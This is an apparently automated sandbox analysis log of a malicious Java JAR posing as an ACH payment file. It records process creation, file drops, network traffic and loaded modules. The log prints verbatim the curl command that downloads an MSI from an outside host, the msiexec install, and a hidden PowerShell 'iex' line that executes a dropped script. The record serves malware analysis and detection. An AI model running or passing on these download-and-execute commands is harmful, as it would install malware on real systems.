Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:48:30 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:48:37 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:48:43 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:48:50 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:48:57 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:03 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:11 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:17 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:24 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:38 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:45 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:51 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:58 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: sjm.19.drString found in binary or memory: http://64.95.10.191/
Source: java.exe, 00000002.00000002.1439346877.00000000097F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
Source: java.exe, 00000002.00000002.1436738305.000000000472C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/k
Source: java.exe, 00000002.00000002.1439346877.0000000009750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.oracle.com/
Source: Y49AzuUN.classString found in binary or memory: https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
Source: java.exe, 00000002.00000002.1436738305.000000000460B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiC
Source: java.exe, 00000002.00000002.1440388947.0000000014D13000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1323029932.0000000014D13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiC:
Source: java.exe, 00000002.00000002.1436738305.000000000460B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiS
Source: curl.exe, 0000000B.00000002.1286661864.00000000009B0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000B.00000002.1286780766.0000000002C70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiWinSta0
Source: java.exe, 00000002.00000002.1440388947.0000000014D13000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1323029932.0000000014D13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiXq
Source: curl.exe, 0000000B.00000002.1286661864.00000000009B0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000B.00000002.1286780766.0000000002C70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msicurl.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownHTTPS traffic detected: 172.67.168.231:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: PING.EXEProcess created: 46
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\46f335.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{5388A5D6-8B37-4242-B64C-4D72F236B407}Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF45E.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\46f337.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\46f337.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\46f337.msiJump to behavior
Source: classification engineClassification label: mal52.troj.expl.winJAR@115/28@1/3
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CMLF49C.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5860:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1900:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1756:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1592:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar"" >> C:\cmdlinestart.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c C:\downloads\aHPCrYM1.msi
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\downloads\aHPCrYM1.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c C:\downloads\aHPCrYM1.msiJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\downloads\aHPCrYM1.msi" Jump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: winmm.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: version.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
